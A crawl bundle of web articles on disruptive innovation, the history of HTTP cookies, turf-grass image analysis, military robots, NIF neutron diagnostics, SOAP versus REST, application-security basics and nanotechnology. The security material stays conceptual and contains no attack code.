https://www.gillware.com/sd-card-recovery-service/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00357-ip-10-171-10-70.ec2.internal.warc.gz
en
0.926078
2,101
2.8125
3
A disruptive innovation can help create a new market and value network, or disrupt an existing market and value network by displacing an earlier technology. The term is used to describe innovations that improve a product or service in ways that the market does not expect; typically first by designing for a different set of consumers in a new market, and later by lowering prices in the existing market. The term "disruptive innovation" was coined by Harvard professor Clayton M. Christensen in his research on the disk-drive industry, and later popularized by his book, "The Innovator's Dilemma", published in 1997.

A classic example is the personal computer. Prior to its introduction, mainframes and minicomputers were the prevailing products in the computing industry. Apple, one of the pioneers in personal computing, began selling its early computers in the late 1970s and early 1980s, initially as little more than a toy for children. Gradually, the innovation improved. Within a few years, the smaller, more affordable personal computer became good enough to do the work that previously required minicomputers. This created a huge new market and ultimately eliminated the existing industry.

Most recently, in the Internet of Things, Belkin's WeMo has been disrupting the space with a range of simple-to-use attachments that allow consumers to program basic behaviors (e.g., on/off) for their electrical devices. Belkin has been improving and expanding on a winning formula, which includes giving its customers access to a visual interface to create "If This, Then That" recipes for controlling their home devices. Now WeMo is offering the WeMo Maker kit, which can be used to convert many electrical devices powered by DC transformers into programmable appliances.

There are many more disruptive innovations that are changing the world as we see and experience it. Some of the interesting ones are:

Autonomous Vehicles: The continued evolution of fully self-driving or "autonomous" vehicles. Their arrival is now just a matter of time and is expected to transform the transportation industry. The technology and cost for autonomous vehicles are almost ready for the mass market, with the real hold-up being the regulators, who barely know how to begin rethinking a hundred years of safety, insurance, and traffic laws.

Health and Fitness – The Quantified Self: There are numerous new applications that collect, report, and respond to information from a user's own body, a trend that is sometimes referred to as "the quantified self." These include devices for health and improved fitness training. There are separate categories for seniors, people with disabilities, kids, and athletes, again using much of the same technology.

Manufacturing – 3D Printing and Robotics: 3D printing pioneer MakerBot announced the availability of filaments (the basic plastic media used by the printers) that have integrated real-world materials including iron, bronze, maple, and limestone. Printing objects with these new media can produce much more realistic-looking output, moving the technology closer to printing "real" items rather than plastic simulacra.

The Internet of Things: Everyday objects are now made capable of collecting, sending, and receiving information through ever smaller and more powerful embedded components. The disruptive impact will cross many industries, including manufacturing, distribution, retailing, consumer products, agriculture, and transportation.
Augmented Reality: Advances in display and audio technologies enable users to experience real and imagined environments with ever-greater richness, whether in the form of virtual reality goggles and earphones that provide immersive gaming experiences or superimposed displays that augment the view out a car window. The continued decline in price, size, and power requirements for basic computing components continues to spark revolutionary change in the world of sensory input.

Today, disruptive innovation is no longer an exception; it's the rule. If we are not proactively driving disruption, we'll eventually need to react to it. Having a disruptive innovation capability is mandatory, both for growing a business and for protecting existing markets. In the modern enterprise, disruptive innovation requires employees to embrace a radically different approach to product development or marketing. Often a product of out-of-the-box thinking, disruptive changes can initially seem out of step with contemporary preferences, but in the longer run they prove successful in their ability to create new market opportunities where none existed before.

The potential for reinvention is all around us, and it's an exciting time to be thinking about how to structure (or restructure) our business, community, or even life in ways that create new value. As Richard Branson says, "One has to passionately believe it is possible to change the industry, to turn it on its head, to make sure that it will never be the same again."
<urn:uuid:9ebefa16-49b8-4f43-a2df-b37337a55b44>
CC-MAIN-2017-04
https://www.hcltech.com/blogs/disruptive-innovation
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00173-ip-10-171-10-70.ec2.internal.warc.gz
en
0.950417
971
3.1875
3
A History of Cookies and Their Importance

When most people hear the word "cookie," the first thing they often think of are sweet baked goods, often made with chocolate chips, peanut butter or oatmeal. When speaking about the Internet, however, "cookie" takes on a different meaning. According to www.whatis.com, an IT definition Web site, a cookie is "information that a Web site puts on your hard disk so that it can remember something about you at a later time." They sometimes are called "HTTP cookies" or "Web cookies" to help distinguish them from the edible variety. Whatever you call them, they are an important part of e-commerce and Web browsing.

Cookies can be used for many things, such as authenticating logins to Web sites and storing preferences for those sites, and they can be used for tracking where a user goes, whether within a Web site or between Web sites. Some who are familiar with these possible uses consider all cookies to be evil, while others consider them to be innocuous files used for storing data on the local machine. The truth, however, lies somewhere in between. To understand this difference of opinion and the importance of cookies, one must understand the origins of cookies and how they got to where they are today, along with the benefits they provide.

Origin of Cookies

The origin of cookies can be traced back to June 1994. While employed at Netscape, Lou Montulli was working on an e-commerce application for a customer. He came up with the idea of cookies to solve problems they had implementing an online shopping cart. Montulli and John Giannandrea created the first Netscape cookie specification, which was included in Version 0.9 beta of Netscape, released that October. Montulli and Giannandrea applied for a patent on this technology in 1995, which they received three years later. The first version of Internet Explorer to support cookies was Version 2, which was released in October 1995.

In April 1995, discussions for a formal cookie specification began. Initially, two proposals were introduced. The Internet Engineering Task Force (IETF) created a special working group to work on this specification. The group soon decided to use the Netscape specification as a starting point.

When cookies were first introduced, browsers accepted them by default, without the knowledge of the user. While some people knew about cookies from the beginning, the general public did not know about them until an article appeared in the international business newspaper Financial Times on Feb. 12, 1996. Around the time of the Financial Times article, the IETF identified third-party cookies as a serious threat to privacy. Because of this, when RFC 2109 was published a year later in February 1997, it stated that third-party cookies should either not be allowed at all or, at minimum, not be enabled by default. At the time, Netscape and Internet Explorer ignored this recommendation regarding third-party cookies. RFC 2965 was published in October 2000, further detailing specifications for cookies.

With this increased awareness, people began to think about possible privacy concerns regarding cookies. This caused the U.S. Federal Trade Commission to discuss cookies twice in hearings, once in 1996 and again in 1997.

Detriments and Benefits of Cookies

By the time RFC 2109 was published, many advertising companies had started using third-party cookies. These cookies were used to provide users with appropriate advertisements and, in some cases, track what Web sites users visited.
The latter is only possible when visiting sites that receive ads from the same service such as DoubleClick. Many Web sites rely on cookies to function, however.
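As a small illustration of the mechanism described above, here is how a server can bake a cookie into an HTTP response and how the browser later replays it, sketched with Python's standard http.cookies module; the cookie name, value, and site are invented for illustration.

```python
from http.cookies import SimpleCookie

# Server side: attach a cookie to the HTTP response.
cookie = SimpleCookie()
cookie["session_id"] = "abc123"            # hypothetical value
cookie["session_id"]["path"] = "/"
cookie["session_id"]["max-age"] = 3600     # keep it for one hour
print(cookie.output())  # e.g. Set-Cookie: session_id=abc123; Path=/; Max-Age=3600

# Client side: the browser stores the cookie and sends it back with every
# later request to the same site, which is what lets the server
# "remember something about you at a later time":
#
#   GET /cart HTTP/1.1
#   Host: shop.example.com
#   Cookie: session_id=abc123
```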
<urn:uuid:c948ef09-4385-462c-9679-49e580acf9f8>
CC-MAIN-2017-04
http://certmag.com/a-history-of-cookies-and-their-importance/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00319-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963058
752
3.234375
3
Tiwari A.K., Directorate of Floricultural Research | Kumar R., Directorate of Floricultural Research | Kumar G., Directorate of Floricultural Research | Kadam G.B., Directorate of Floricultural Research | And 2 more authors. Indian Journal of Agricultural Sciences | Year: 2014

The ability to capture information on turf grass in situ makes digital-camera-based image analysis a viable tool for quantifying turf grass (Cynodon dactylon Pers.) in field experiments. In addition to colour quantification, digital image analysis has been used successfully to quantify percentage turf grass cover, and it has also proved useful in quantifying turf parameters such as weed infestation, disease incidence, herbicide toxicity, leaf area, and recovery from injury. Colour is one of the major criteria used to evaluate the quality of turf and lawn. To generate variability in Bermuda grass and select genotypes responsive to low management, gamma-ray irradiation was used to induce dwarfness and other quality attributes. Five dwarf mutant lines (DFR 440, DFR-C-444, DFR-C-445, DFR-C-446 and DFR-C-448) were isolated. In the present study, a camera and image analysis technique is applied to measure turf colour by its reflectance on the HSB colour scale. The data show that the dwarf mutant lines had better quality, with lower canopy height, shorter internodes, and shorter leaves than the parent. It is demonstrated that image analysis is a suitable non-destructive tool for assessing turf grass colour in a reproducible and calibrated manner, over a wide span of structural and colour attributes of turf grass.
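The abstract does not include code, but the percentage-cover style of measurement it describes can be sketched with a simple hue threshold. The hue window and saturation/value floors below are illustrative assumptions, not values taken from the study, and would need calibration against reference plots.

```python
import cv2
import numpy as np

def percent_turf_cover(image_path, hue_range=(35, 85), s_min=60, v_min=40):
    """Estimate percent green (turf) cover from a downward-facing photo."""
    bgr = cv2.imread(image_path)
    hsv = cv2.cvtColor(bgr, cv2.COLOR_BGR2HSV)   # OpenCV hue runs 0-179
    lower = np.array([hue_range[0], s_min, v_min], dtype=np.uint8)
    upper = np.array([hue_range[1], 255, 255], dtype=np.uint8)
    mask = cv2.inRange(hsv, lower, upper)        # 255 where a pixel looks "green"
    return 100.0 * np.count_nonzero(mask) / mask.size

print(percent_turf_cover("plot_photo.jpg"))      # hypothetical image file
```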
<urn:uuid:3608b27d-65c6-4531-8cdb-f7073faace71>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/directrate-of-floricultural-research-1366783/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00319-ip-10-171-10-70.ec2.internal.warc.gz
en
0.919344
343
2.765625
3
U.S. Military Robots Of The Future: Visual Tour

Meet robots that fight fires, climb ladders, search for bombs, and race across the battlefield. The technological singularity is near, say military strategists.

Cockroaches have a reputation for being indestructible. That could explain DASH (Dynamic Autonomous Sprawled Hexapod), a cockroach-like robot developed by the Biomimetic Millisystems Lab at the University of California, Berkeley. DASH is small (10 cm) but fast (15 body lengths per second) and resilient (it can survive a ground impact of 10 meters per second). Besides the creepiness factor, the crawling robots might be used as nodes on a dispersed network.

Image credit: UC Berkeley
<urn:uuid:27f0b77d-ae4f-416c-89b8-b6f6ad985f58>
CC-MAIN-2017-04
http://www.darkreading.com/risk-management/us-military-robots-of-the-future-visual-tour/d/d-id/1104038?page_number=11
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00531-ip-10-171-10-70.ec2.internal.warc.gz
en
0.795452
244
2.703125
3
Glebov V.Yu., University of Rochester | Sangster T.C., University of Rochester | Stoeckl C., University of Rochester | Knauer J.P., University of Rochester | And 28 more authors. Review of Scientific Instruments | Year: 2010

The National Ignition Facility (NIF) successfully completed its first inertial confinement fusion (ICF) campaign in 2009. A neutron time-of-flight (nTOF) system was part of the nuclear diagnostics used in this campaign. The nTOF technique has been used for decades on ICF facilities to infer the ion temperature of hot deuterium (D2) and deuterium-tritium (DT) plasmas based on the temporal Doppler broadening of the primary neutron peak. Once calibrated for absolute neutron sensitivity, the nTOF detectors can be used to measure the yield with high accuracy. The NIF nTOF system is designed to measure neutron yield and ion temperature over 11 orders of magnitude (from 10^8 to 10^19), neutron bang time in DT implosions with yields between 10^12 and 10^16, and to infer areal density for DT yields above 10^12. During the 2009 campaign, the three most sensitive neutron time-of-flight detectors were installed and used to measure the primary neutron yield and ion temperature from 25 high-convergence implosions using D2 fuel. The OMEGA yield calibration of these detectors was successfully transferred to the NIF. © 2010 American Institute of Physics.
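For readers unfamiliar with the technique, the relations below are the textbook ones commonly used in nTOF analysis (due to Brysk, 1973); they are not quoted in this abstract, so treat the constants as standard values rather than NIF-specific calibration:

```latex
% Doppler width of the primary neutron peak; T_i and \Delta E in keV:
\Delta E_{\mathrm{FWHM}} \approx 177\sqrt{T_i} \;\text{(DT, 14.1 MeV)}, \qquad
\Delta E_{\mathrm{FWHM}} \approx 82.5\sqrt{T_i} \;\text{(DD, 2.45 MeV)}

% Converted to time of flight over a distance d (non-relativistic, t = d/v):
\frac{\Delta t}{t} = \frac{1}{2}\,\frac{\Delta E}{E}
\quad\Longrightarrow\quad
T_i \propto \left(\frac{\Delta t}{d}\right)^{2}
```

A broader peak at the detector therefore means a hotter plasma, which is how the temporal broadening mentioned above becomes an ion-temperature measurement.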
<urn:uuid:7c0c321a-0ad9-41ef-bee0-21f7b334c504>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/commissariat-a-lenergie-atomique-dam-ile-de-france-1319642/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00375-ip-10-171-10-70.ec2.internal.warc.gz
en
0.886079
317
2.859375
3
Q&A: SOAP and REST 101

What are SOAP and REST? What do these Web services have in common and where is each best used? We take a closer look.

SOAP and REST are frequently used acronyms for Web services. What are these technologies, what do they do, how are they similar and different, and what are the best uses for each? For answers, we turned to Elias Terman, director of product marketing at SnapLogic.

Enterprise Strategies: Can you provide some historical context around SOAP and REST?

Elias Terman: The word SOAP started its life as an acronym for Simple Object Access Protocol, but has now come to be known as a specific stack of standards and protocols (SOAP, XML, WSDL, etc.) for providing interoperability among distributed applications. The initial idea behind SOAP was to address the need for a "web of software services" that could be exposed over a network and could be both created and consumed outside of traditional enterprise boundaries. The idea was to use Internet protocols, open formats such as XML, and standards to promote interoperability between distributed applications. Sounds pretty basic today, but this was a revelation in 2000. Early backers of SOAP included IBM and Microsoft.

REST stands for REpresentational State Transfer and refers to the architectural style described in Roy Fielding's 2000 Ph.D. thesis at the University of California, Irvine. Fielding explained that the World Wide Web could be used as a platform to connect services at a global scale. His work showed that the Web itself is an application platform and that REST provides the guiding principles of how to build distributed applications that scale well, exhibit loose coupling, and compose functionality across service boundaries.

It's interesting to note that early critics of SOAP complained that it was too simple to provide enterprise-class services. Some critics of REST are making this same argument today.

Which approach is best suited for Web services and why?

Web services are simply a set of standards for realizing service-oriented architecture (SOA). Most people associate SOAP with SOA, but REST is equally suited for Web services, so the specific use case will be the determining factor. The key tenets of SOA are services, interoperability, and loose coupling. REST meets this definition, but its services come in the form of resources. Web services standards initially started with XML, HTTP, WSDL, SOAP, and UDDI but now comprise almost 70 standards and profiles developed and maintained by standards bodies such as the World Wide Web Consortium (known as the W3C).

A RESTful Web service is a simpler approach, one that is implemented using HTTP and the principles of REST. It is a collection of resources, with three defined aspects:

- The base URI (Uniform Resource Identifier) for the Web service, such as http://example.com/resources/.
- The Internet media type of the data supported by the Web service. This is often JSON or XML but can be any other valid Internet media type.
- The set of operations supported by the Web service using HTTP methods (e.g., POST, GET, PUT or DELETE).

As described by the W3C, the architecture of the Web is the culmination of thousands of simple, small-scale interactions between agents and resources that use the founding technologies of HTTP and the URI.

How do SOAP and REST handle the transmission of messages and the movement of data?

Although SOAP messages can be transported in a number of ways, they are sent almost exclusively using HTTP (or HTTPS).
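As a hedged sketch of what that looks like on the wire (the endpoint, operation name, and payload below are invented for illustration and belong to no real service), a SOAP call is simply an XML envelope POSTed over HTTP:

```python
import requests

envelope = """<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
  <soap:Body>
    <GetQuote xmlns="http://example.com/stock"> <!-- hypothetical operation -->
      <Symbol>ACME</Symbol>
    </GetQuote>
  </soap:Body>
</soap:Envelope>"""

resp = requests.post(
    "https://example.com/stockservice",            # assumed service URL
    data=envelope.encode("utf-8"),
    headers={"Content-Type": "application/soap+xml; charset=utf-8"},
)
print(resp.status_code, resp.text[:200])
```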
REST uses HTTP (and HTTPS) as transport exclusively. With SOAP Web services, XML is used to tag the data, SOAP is the standardized XML layout used to transfer the data, and WSDL is used for describing the structure of the services. SOAP's XML-based messaging framework consists of three parts: an envelope that defines what is in the message and how to process it, a set of encoding rules for expressing instances of application-defined data types, and a convention for representing procedure calls and responses.

REST uses simple HTTP to exchange messages between machines. RESTful applications use HTTP requests to post, read, and delete data. REST's uniform interface is considered fundamental to the design of any REST service. With REST, all resources are identified using URIs, and the resources themselves are represented using HTML, XML, JSON, and other common formats.

What are some of the primary differences between SOAP and REST?

REST allows for different data formats (such as JSON, ATOM, and others) whereas SOAP is limited to XML. Unlike SOAP, REST reads can be cached, which improves performance and scalability over the Internet. REST relies on HTTP-based security and can't provide a two-phase commit across distributed transactional applications, but SOAP can. Internet apps generally don't need this level of transactional reliability, but enterprise apps sometimes do. Similarly, REST doesn't have a standard messaging system and expects clients to deal with communication failures by retrying. SOAP has more controls around retry logic and thus can provide more end-to-end reliability and service guarantees.

SOAP achieves loose coupling through middleware (e.g., an Enterprise Service Bus) whereas REST is innately loosely coupled. Coupling is simply the amount of dependency between two hardware or software elements or systems. With SOAP and tight coupling, elements are more tightly bound to one another, so that when one element changes other elements are impacted. Loose coupling reduces dependencies between elements or uses compensating transactions to maintain consistency. A Web site is a great example of a loosely coupled set of elements. If one of the pages is not available, you get a 404 Not Found page for that particular page. As an extreme example, if that particular page were very tightly coupled with the rest of the Web site, the entire site would go down.

Where is SOAP best deployed? Where is REST best used? Can they co-exist?

SOAP is best for mission-critical applications that live behind the firewall, while REST is made for the cloud. SOAP is all about servers talking to servers, with rigid standards, extensive design, serious programming, and heavyweight infrastructure all essential parts of the equation. As you might expect, then, SOAP does a better job of maintaining consistency in complex environments through the use of techniques such as a two-phase commit. For example, consider wiring money to a bank account. Did the transaction fail? It's probably a bad idea to continue to automatically wire the money over and over again, so SOAP might make more sense if you're orchestrating a set of complex services to effect a transaction -- no transaction takes place unless each and every distributed service succeeds.

If you're interested in building your applications quickly and with maximum portability -- especially if the Cloud (public, private, or hybrid) is in the picture -- it's hard to beat REST.
It sports a mere handful of simple HTTP API commands, and every object (known as a "resource") has its own unique Uniform Resource Identifier that provides a path and distinct name. REST's straightforward API and clear, consistent labeling philosophy are far more developer-friendly than SOAP, which mandates deep understanding of site-specific APIs. REST lets you publish your data and have others -- regardless of where they might be -- work with it. Just looking at the URI gives you an indication of how to proceed. Today, REST is clearly winning out when it comes to API protocols. SOAP and REST can coexist in that you can build your service logic once and then expose two interfaces for it: SOAP for inside the firewall (including all its related quality-of-service capabilities) and REST for outside the firewall.

When it comes to meeting integration requirements in the cloud, which approach provides the most flexibility and extensibility, and why?

REST wins when it comes to integration requirements involving the cloud. REST's sweet spot is exposing a public API over the Internet to handle CRUD (create, read, update, and delete) operations on data. REST is focused on accessing named resources through a uniform interface. Uniform interfaces are innately better when it comes to integration. Don't take my word for it. The Internet itself has already weighed in on this one. Programmable Web shows that a whopping 73 percent of APIs registered on their site are REST-based while only 16 percent offer SOAP. Perhaps most importantly, if you need to get something up and running quickly, with good performance and low overhead, REST beats SOAP -- and isn't that what cloud computing is all about?
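For comparison with the SOAP sketch earlier, here is the same spirit of interaction done RESTfully; the base URI is invented, and the Location-header convention shown is common but not universal:

```python
import requests

base = "https://example.com/resources"            # assumed base URI

# Create a resource, then read, update, and delete it with plain HTTP verbs.
created = requests.post(base, json={"name": "widget"})
widget_uri = created.headers["Location"]          # e.g. .../resources/42

widget = requests.get(widget_uri).json()          # GET: read it back
requests.put(widget_uri, json={**widget, "name": "gadget"})  # PUT: update
requests.delete(widget_uri)                       # DELETE: remove it
```

Everything a client needs is carried by the URI and the verb, which is the uniform interface described above.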
<urn:uuid:ddf6fef8-5dfc-4fb7-b896-ca7a6dd001e0>
CC-MAIN-2017-04
https://esj.com/articles/2011/08/01/soap-and-rest-101.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00521-ip-10-171-10-70.ec2.internal.warc.gz
en
0.928954
1,811
2.578125
3
Application security: controls and techniques

Applications today are not used only by engineers and computer specialists. There is a computer in almost every home, and everyone is busy on it. Getting stuck on a problem, finding no way out of it, and trying this and that to resolve it are the usual instincts a non-specialist follows when working with a computer. When all that effort seems to be going in vain, the user turns to the Internet for a guide to resolving the problem. But many problems can be prevented before any damage is done with a little advance knowledge. That background often helps a user identify a problem, and sometimes even resolve it on their own.

It is safe to assume that every program contains bugs, and bugs degrade the operation of the program. A bug must therefore be discovered before it can be removed; removing it, or debugging the program, makes the program work faster and more smoothly. To locate bugs, fuzz testing is conducted; otherwise the presence and location of a bug remain unknown. The methodology generally used for fuzz testing is black-box testing, which gives the process a cost benefit. Fuzzing is an automated or semi-automated software testing technique that feeds invalid data, malformed syntax, and random data into a program in an attempt to make it crash. Fuzz testing provides assurance beyond fixing individual bugs: it exercises the entire system, uncovering defects such as data leaks and input-handling crashes, and so reduces the risk of the software crashing or malfunctioning in the field.

Secure coding concepts

Secure coding is the process of writing programs so that they are resistant to attack by malicious code. Malicious code can cause data to be lost, fragmented, or corrupted; the sudden and unusual crashing of a program is a common symptom. Malicious code is usually not a separate program but is inserted within a host program, whether intentionally or through a programmer's mistake. Insecure programs can result in data being stolen, lost, or corrupted, and can cause denial or loss of service. Malicious code can even take control of the program and make it misbehave, exposing the program's secrets and damaging the whole system. Secure coding, therefore, is necessary for a program to be trustworthy and to function correctly.

Error and exception handling: Not every malfunctioning line of code is malicious; there are honest defects as well. These should be identified and corrected, with errors and exceptions caught and handled gracefully, rather than simply cut out of the program.

Input validation: If input is validated at the moment it enters the program, screening out malformed or malicious values, the whole program becomes more secure, and many classes of bugs never get the chance to trigger. Proper attention to input validation saves a great deal of time and effort later.
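A minimal sketch of input validation at the boundary, in Python; the field names and rules are invented for illustration, and a real application would lean on a vetted validation library rather than hand-rolled regular expressions:

```python
import re

EMAIL_RE = re.compile(r"^[\w.+-]+@[\w-]+\.[\w.-]+$")   # deliberately simple

def validate_signup(form: dict) -> dict:
    """Check untrusted input before it reaches the rest of the program.
    Reject bad values outright rather than trying to repair them."""
    errors = {}
    if not re.fullmatch(r"[A-Za-z0-9_]{3,20}", form.get("username", "")):
        errors["username"] = "3-20 letters, digits, or underscores"
    if not EMAIL_RE.match(form.get("email", "")):
        errors["email"] = "not a valid email address"
    try:
        if not 13 <= int(form.get("age", "")) <= 120:
            errors["age"] = "out of range"
    except ValueError:
        errors["age"] = "must be a whole number"
    return errors

print(validate_signup({"username": "bob!", "email": "bob@example", "age": "x"}))
# -> all three fields rejected before they can do any harm
```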
Cross-site scripting prevention

Cross-site scripting, commonly abbreviated XSS (and occasionally CSS, though that risks confusion with Cascading Style Sheets), is a type of computer security vulnerability typically found in web applications. An XSS flaw can be abused by attackers to inject script into pages served by one website to its users, because the vulnerable page echoes attacker-supplied content back to the browser. A page that reflects user input this way should not be left open for arbitrary editing, as that opens the gate for hackers to insert malicious JavaScript into the web page. Such an injection can siphon data out of the website, and even important files from its store can be extracted by the attackers. A web vulnerability scanner can be run against the site to detect such flaws, but the surest way to prevent XSS is to restrict or escape user-supplied markup before it is rendered; unrestricted multi-user editing of raw HTML is the classic opening.

Cross-site Request Forgery (XSRF) prevention

Cross-site request forgery is a type of web attack in which a malicious website, email, blog post, or instant message causes the victim's web browser to perform unwanted actions on a trusted site where the user is already authenticated. The impact of such forgery is limited to what the vulnerable application exposes, yet a single forged action can compromise everything that depends on it. For example, forged requests typically target fund transfers or password changes; by these means the hackers learn passwords and transaction details, and the entire account or system is then at risk. On social networks and other sites where HTML can be posted, hackers can apply social engineering to plant JavaScript or plain malicious HTML. Worms of this kind, such as the MySpace worm, can exploit an entire system, especially if the victim is an administrator of the website. To curb such attacks, many social networks removed the facility that allowed users to paste raw HTML.

Application configuration baseline (proper settings)

Sometimes a site will not allow any downloads. One may think there is a problem with the website, but the real problem is often not the website; it is the settings of the computer. A step-by-step process to fix the Java settings is as follows. First, go to System Preferences and open the Java settings. When the Java Control Panel opens, the small window will have five tabs along its top, from left to right: General, Update, Java, Security, and Advanced. Go to the Security tab. There you will find the security-level scale, with three marks, Very High, High, and Medium, and below it an Edit Site List pane, which can be edited. Click the small Edit Site List button and enter the address of the site you are configuring. When you press Enter, a small pop-up window will ask permission to create an exception list. Once that is saved, the site will no longer be blocked from downloading objects.
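Returning to the XSS prevention discussed above, the single most useful habit is escaping user-supplied text before it is written into a page. A minimal sketch with Python's standard html module follows; the payload is a classic cookie-stealing example, and real applications would layer this with input validation, Content-Security-Policy headers, and templating engines that escape by default:

```python
import html

def render_comment(user_text: str) -> str:
    # Escape <, >, &, and quotes so the browser treats the text as text,
    # never as markup or script.
    return "<p class='comment'>" + html.escape(user_text) + "</p>"

payload = "<script>new Image().src='http://evil.example/?c='+document.cookie</script>"
print(render_comment(payload))
# -> <p class='comment'>&lt;script&gt;...&lt;/script&gt;</p>  (rendered inert)
```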
Hardening

Applications are prone to attack because much of their surface is exposed to untrusted input and hostile websites. The process of reducing this exposed surface, and thereby securing the system, is known as hardening. A system with a larger exposed surface generally offers more functionality, yet once any part of that surface is compromised, the entire system can be damaged, so it is usually better to harden the security posture. A typical system accumulates unnecessary services, unused logins, and stale or default usernames; removing them makes the surface less vulnerable. Hardening is usually carried out by applying patches regularly and keeping automatic updates enabled.

Application patch management

A patch is a security update designed to fix vulnerabilities in applications and their plug-ins. Patch management is the strategy for deciding exactly which patch a particular application or device needs, and the right time and format for applying it. Managing patches well not only secures a program against vulnerabilities but also helps the application run faster and more accurately, so the software stays secure while performing at its best.

NoSQL databases vs. SQL databases

"Not Only SQL," popularly known as NoSQL, describes databases that provide a mechanism for storing data modelled in forms other than relational tables. Simplicity of design, and the ability to scale the data horizontally as well as vertically as required, are what make NoSQL databases strong. Certain operations run very fast in NoSQL databases, so they are used heavily for handling big data, where some relaxation of consistency is accepted in exchange for partition tolerance. However, NoSQL systems tend to use lower-level query languages, which is one reason they lack standardized interfaces.

SQL, the Structured Query Language, communicates with a database in a different way. It is standardized by the American National Standards Institute (ANSI) as the standard language for relational database management systems, which enables SQL to update a database or retrieve data from it easily and effectively. SQL is also straightforward to operate, using common commands such as SELECT, CREATE, DELETE, and DROP, which makes programming and operation much easier.
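A short sketch with Python's built-in sqlite3 module shows those commands in action; the table and values are invented, and the parameterized `?` placeholder is worth noting because it also guards against SQL injection, tying back to the input-validation theme above:

```python
import sqlite3

conn = sqlite3.connect(":memory:")       # throwaway in-memory database
cur = conn.cursor()

cur.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
cur.execute("INSERT INTO users (name) VALUES (?)", ("alice",))  # parameterized
conn.commit()

for row in cur.execute("SELECT id, name FROM users"):
    print(row)                            # -> (1, 'alice')

cur.execute("DELETE FROM users WHERE name = ?", ("alice",))
cur.execute("DROP TABLE users")
conn.close()
```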
Server-side vs. Client-side validation

In the data validation process, validation can be done at either end. Validation at the client (user) end is known as client-side validation, whereas validation at the website (server) end is called server-side validation.

Server-side validation: Here the client's input is checked on the server by application code written in a language such as PHP or ASP.NET. After validation is complete, a dynamically generated web page carrying the result is returned to the client.

Client-side validation: Client-side validation does not require a round trip to the server, which reduces network traffic and gives faster feedback. It is usually performed in the browser using a scripting language, most commonly JavaScript or VBScript, or with HTML5 form attributes. A simple example: you get an error message when you omit the '@' sign while typing an email address into a form. The data inserted by the client is checked instantly, and the error message is the result of that check. Client-side checks improve the user experience, but since they can be bypassed, the server must always validate the input again.

These are some of the basics of application security that can help a user when common problems appear in a system, application, or program. With this background, a user stands a much better chance of protecting his or her system from everyday problems.
<urn:uuid:228ec9ce-e17e-4fc6-b39e-f32c5c921db3>
CC-MAIN-2017-04
https://www.examcollection.com/certification-training/security-plus-application-security-controls-and-techniques.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00247-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939206
2,312
2.96875
3
CBR peers into the future, and the future is small…

Nanotechnology is one of the buzzwords of science today, and deals with technology on the 'nano' scale. What's the nano scale!? The nano scale is so small that you can't see it with a regular microscope; in fact, a nanometre is one-billionth of a metre. A typical atom is about one-tenth of a nanometre in diameter. At this scale, scientists are able to manipulate atoms themselves, and that leads to the creation of all sorts of fascinating and interesting materials.

One prime example is the carbon nanotube, which is made by rolling a sheet of graphite molecules into a tube. The right combination of nanotubes can create a structure that is hundreds of times stronger than normal steel but only one-sixth the weight. This is just one example of the practical use of nanotechnology. A concise formal definition of nanotechnology is:

"The design, characterization, production, and application of structures, devices, and systems by controlled manipulation of size and shape at the nanometer scale (atomic, molecular, and macromolecular scale) that produces structures, devices, and systems with at least one novel/superior characteristic or property."

What is nanotechnology used for?

Nanotechnology, whilst still being researched and developed, has actually been around for longer than most people think, and is used in many everyday products.

Sunscreen: The aluminium oxide that absorbs the Sun's UV rays actually degrades when mixed with sweat and other molecules. The oxide is mixed with a 'nano-emulsion' that protects the aluminium oxide and keeps your skin safer for longer.

Self-cleaning glass: A firm called Pilkington makes something called Activ Glass, which employs nanoparticles to make the glass surface both hydrophilic and photocatalytic. The hydrophilic properties make liquids spread evenly over the surface, and the photocatalytic properties allow UV radiation from light to break down and loosen dirt.

Plasters: Yes, believe it or not, most plasters now have nano silver ions that help kill harmful cells and protect from infection.

Case Study: How nano-coating is waterproofing smartphones.

But how can it be used in the future? And what about more technological uses?
<urn:uuid:88a7c5f9-a8ab-4e3f-b1d5-e1186890b973>
CC-MAIN-2017-04
http://www.cbronline.com/news/enterprise-it/what-is-nanotechnology-anyway-4177540
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00027-ip-10-171-10-70.ec2.internal.warc.gz
en
0.921773
502
3.5625
4